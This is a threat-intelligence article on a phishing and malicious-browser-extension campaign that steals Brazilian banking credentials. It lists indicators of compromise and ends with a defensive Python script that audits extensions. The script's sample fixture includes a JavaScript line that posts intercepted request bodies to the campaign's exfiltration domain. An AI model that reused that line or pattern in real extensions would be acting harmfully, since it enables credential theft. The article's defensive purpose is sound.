
Attack chain using a browser extension | Image: Positive Technologies
Positive Technologies has uncovered an ongoing, multi-stage cybercrime campaign—dubbed “EnigmaCyberSecurity”—primarily targeting Brazilian users and financial institutions. The operation leverages phishing emails, malicious browser extensions, and remote access trojans (RATs) to harvest sensitive banking data and infiltrate corporate systems. According to the researchers, the attacks have been active since the beginning of 2025 and have already impacted victims in Brazil, Mexico, Colombia, the Czech Republic, Russia, Vietnam, and beyond.
The campaign begins with phishing emails disguised as invoices, often sent from servers of compromised companies—a tactic that dramatically increases success rates. One of the first-stage payloads is a BAT script that escalates privileges, installs PowerShell modules, and retrieves a remote script designed to evade detection.
“The attackers used a malicious extension for Google Chrome, Microsoft Edge, and Brave browsers,” Positive Technologies noted, “as well as Mesh Agent and PDQ Connect Agent.”
The core of the browser attack chain is a malicious extension posing as a legitimate update, delivered via the Chrome Web Store and Inno Setup/MSI installers. Once installed, it monitors interactions with Banco do Brasil’s online platform. Deobfuscated code revealed that:
- Login and password fields are exfiltrated to financial-executive.com
- A unique victim identifier (eindeutigeKennung) is generated for targeted tracking
- Fake QR codes and loading events simulate bank interactions to trick users
- The extension hooks Chrome extension API events such as onBeforeRequest and onMessage to extract login tokens and passwords
“The attackers collect confidential user information used for authentication in a specific service (presumably Banco do Brasil),” researchers concluded.
The second attack vector involves Mesh Agent, a legitimate remote access tool abused for stealthy persistence and infrastructure infiltration. Delivered via phishing MSI files, it connects to the attackers’ custom server at mesh.computadorpj.com.
Unlike the browser extension—which targets individuals—Mesh Agent enables lateral movement across enterprise networks, posing a serious threat to businesses.
“The RAT attack enables attackers to spread across the infected infrastructure, whereas the malicious extension attack targets only a single user device.”
Investigators identified a vast infrastructure including:
- Malicious domains: computadorpj.com, clientepj.com, ranchocentral.com
- C2 IPs: 142.54.185.178, 107.174.231.26
- Removed extensions: nplfchpahihleeejpjmodggckakhglee, ckkjdiimhlanonhceggkfjlmjnenpmfm
Despite removal from the Chrome Web Store, the extensions were downloaded over 700 times, with attackers relying on compromised corporate websites to spread malicious links. One such page, still live at the time of the report, asks visitors to “Enter the victim’s email address below”—an indicator of mass-targeted phishing via compromised infrastructure.

“The attackers’ goal is to steal authentication data from the victims’ bank accounts,” Positive Technologies concluded.
Organizations and users alike must remain vigilant, especially in regions with active campaigns. Recommendations include:
- Block indicators of compromise (IoCs)
- Audit browser extensions
- Detect Mesh Agent anomalies
- Educate users on invoice-based phishing
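The first two recommendations (blocking the published IoCs and auditing browser extensions) can be combined into one check over a Chromium profile. The script below is an added example written for this summary, not Positive Technologies’ tooling: it walks Chrome’s on-disk `Extensions/<id>/<version>/` layout, flags the two extension IDs named above, and flags any bundled manifest or script that references the listed domains or C2 IPs; the sample profile it builds is constructed for the demo.

```python
import json
import re
import tempfile
from pathlib import Path

# Indicators exactly as listed in the report summary above (no others added).
KNOWN_BAD_IDS = {"nplfchpahihleeejpjmodggckakhglee", "ckkjdiimhlanonhceggkfjlmjnenpmfm"}
KNOWN_BAD_HOSTS = {"financial-executive.com", "computadorpj.com", "clientepj.com",
                   "ranchocentral.com", "142.54.185.178", "107.174.231.26"}
# Hostnames and dotted-quad IPs embedded in manifest or script text.
HOST_RE = re.compile(r"(?i)\b((?:[a-z0-9-]+\.)+[a-z]{2,}|(?:\d{1,3}\.){3}\d{1,3})\b")

def audit_extensions(extensions_dir):
    """Return {extension_id: [reasons]} for every extension matching an indicator."""
    findings = {}
    for manifest in Path(extensions_dir).glob("*/*/manifest.json"):
        ext_id = manifest.parent.parent.name
        reasons = set()
        if ext_id in KNOWN_BAD_IDS:
            reasons.add("extension id listed as malicious")
        # Scan the manifest and every bundled script for the reported hosts;
        # a subdomain such as mesh.computadorpj.com matches via its parent domain.
        for path in manifest.parent.rglob("*"):
            if path.suffix not in {".json", ".js"}:
                continue
            for host in set(HOST_RE.findall(path.read_text(errors="ignore"))):
                parts = host.lower().split(".")
                if {".".join(parts[i:]) for i in range(len(parts))} & KNOWN_BAD_HOSTS:
                    reasons.add(f"{path.name} references {host}")
        if reasons:
            findings[ext_id] = sorted(reasons)
    return findings

def build_sample_profile():
    """Constructed sample: one benign extension and one mimicking the reported
    extension (known id plus an onBeforeRequest listener posting to the exfil host)."""
    root = Path(tempfile.mkdtemp()) / "Extensions"
    good = root / "abcdefghijklmnopabcdefghijklmnop" / "1.0_0"
    bad = root / "nplfchpahihleeejpjmodggckakhglee" / "2.3_0"
    for d in (good, bad):
        d.mkdir(parents=True)
        (d / "manifest.json").write_text(json.dumps({"manifest_version": 3}))
    (good / "bg.js").write_text("fetch('https://example.org/api');")
    (bad / "bg.js").write_text(
        "chrome.webRequest.onBeforeRequest.addListener(d => "
        "fetch('https://financial-executive.com/c', {body: d.requestBody}));")
    return root

print(json.dumps(audit_extensions(build_sample_profile()), indent=2))
```

On a real machine, point `audit_extensions` at the profile’s `Extensions` directory (for example `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions` on Windows); a hit on a domain reference alone is a lead to inspect, not proof of compromise.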